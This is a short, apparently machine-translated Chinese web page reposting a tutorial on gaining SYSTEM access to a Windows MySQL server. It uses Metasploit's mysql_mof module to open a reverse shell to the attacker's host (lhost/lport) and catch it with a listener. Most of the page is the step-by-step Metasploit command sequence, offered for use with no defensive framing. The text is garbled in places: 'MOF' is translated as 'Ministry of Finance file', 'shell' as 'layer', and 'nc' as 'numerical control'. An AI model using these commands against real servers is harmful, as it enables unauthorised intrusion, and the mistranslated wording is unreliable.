mysql mof + metasploit反弹层 - 行业资讯 - 肥雀云

鉴于上篇文章,http://z2ppp.blog.51cto.com/11186185/1975985 mysql mof提权

metasploit已经有针对该方式的利用代码,原理还是一样生成财政部文件,只是metasploit中可以使用到反弹技术,就不用额外添加用户,前提是对方服务器允许访问公网

use 利用/windows/mysql/mysql_mof 　　set password xxx ,,,//设置登录mysql的密码　　set username xxx ,,,//设置登录mysql的用户　　set rhost xxx ,,,,,,//设置要登录的ip地址　　set rport xxxx ,,,,,//设置mysql的端口号　　set payload windows/shell_reverse_tcp ,,,//所使用的反弹模块　　set lhost xxx ,,,,,,//反弹到的ip地址　　set lport xxx ,,,,,,//反弹到的端口　　show options ,,,,,,,//设置完成后,使用该命令可查看设置参数情况　　exploit ,,,,,,,,,,,,//执行

mysql mof + metasploit反弹外壳”> 如没问题,即利用执行 这边我们使用数控监听对应端口号,就可以接收到壳了,通常情况为系统权限,因为财政部文件是由系统执行 <img src= mysql mof + metasploit反弹层